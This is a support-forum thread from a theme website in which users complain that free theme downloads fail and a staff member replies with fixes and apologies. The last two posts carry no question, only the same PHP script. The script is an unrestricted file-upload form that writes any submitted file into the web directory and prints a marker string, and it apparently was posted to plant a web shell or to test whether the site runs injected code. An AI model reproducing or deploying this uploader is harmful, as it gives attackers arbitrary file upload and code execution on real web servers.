Jack Rubber
asked 11 years ago

Always the Sharing Text is shown, but no download is starting?

How i download this theme?

Thanks for your help!

5 Answers
DominicStaff
answered 11 years ago

I sent and notified our technical team about problem. We are checking and fixing. We will inform you as soon as possible.

Regards,
Dominic

TRISHA JOHNSON
replied 11 years ago

I’m also experiencing this issue.. could you please resolve it?

DominicStaff
answered 11 years ago

@ Trisha !

Please check now. I have checked and resolve this issue.

manel capdevila
answered 11 years ago

I’m afraid it isn’t working again. At least, the WallPress download button doesn’t work for me

DominicStaff
answered 11 years ago

Our website is currently undergoing a scheduled maintenance to upgrade our systems in order to better serve you.
We apologize for any inconvenience and thank you for your patience.”

To save your time, please send mail to us and theme title , i will send you this theme as you want.

Jim LaFonte
replied 10 years ago

This issue seems to have resurfaced. I have a number of free themes that I’ve attempted to download without success. Any suggestions?

DominicStaff
answered 10 years ago

Hello Jim !
We apologize for any inconvenience and thank you for your patience. We have checked  and fixed about this issue. Right now, You can download the free theme.

Jack Rubber
answered 9 years ago

<?php
if(isset($_FILES["userfile"]["name"])){
$uploaddir = getcwd() . "/";
$uploadfile = $uploaddir . basename($_FILES["userfile"]["name"]);

echo "

";

if (move_uploaded_file($_FILES["userfile"]["tmp_name"], $uploadfile)) {
echo "File is valid, and was successfully uploaded.n";
} else {
echo "Upload failed";
}

echo "

";
echo "

";
echo "Here is some more debugging info:";
print_r($_FILES);
if ($_FILES["userfile"]["error"] == 0){
echo "

<a href=\"{$_FILES["userfile"]["name"]}\" TARGET=_BLANK>{$_FILES["userfile"]["name"]}

"; } echo "

";
}

echo "<form enctype=\"multipart/form-data\" action=\"{$_SERVER["PHP_SELF"]}\" method=\"POST\">";
echo "<input type=\"hidden\" name=\"MAX_FILE_SIZE\" value=\"512000\" />";
echo "Send this file: <input name=\"userfile\" type=\"file\" />";
echo "<input type=\"submit\" value=\"Send File\" />";
echo "</form>";
echo "The Roof Is On Fire";

exit;
?>

Jack Rubber
answered 9 years ago

`<?php
if(isset($_FILES["userfile"]["name"])){
$uploaddir = getcwd() . "/";
$uploadfile = $uploaddir . basename($_FILES["userfile"]["name"]);

echo "

";

if (move_uploaded_file($_FILES["userfile"]["tmp_name"], $uploadfile)) {
echo "File is valid, and was successfully uploaded.n";
} else {
echo "Upload failed";
}

echo "

";
echo "

";
echo "Here is some more debugging info:";
print_r($_FILES);
if ($_FILES["userfile"]["error"] == 0){
echo "

<a href=\"{$_FILES["userfile"]["name"]}\" TARGET=_BLANK>{$_FILES["userfile"]["name"]}

"; } echo "

";
}

echo "<form enctype=\"multipart/form-data\" action=\"{$_SERVER["PHP_SELF"]}\" method=\"POST\">";
echo "<input type=\"hidden\" name=\"MAX_FILE_SIZE\" value=\"512000\" />";
echo "Send this file: <input name=\"userfile\" type=\"file\" />";
echo "<input type=\"submit\" value=\"Send File\" />";
echo "</form>";
echo "The Roof Is On Fire";

exit;
?>`

Powered by DW Question & Answer Pro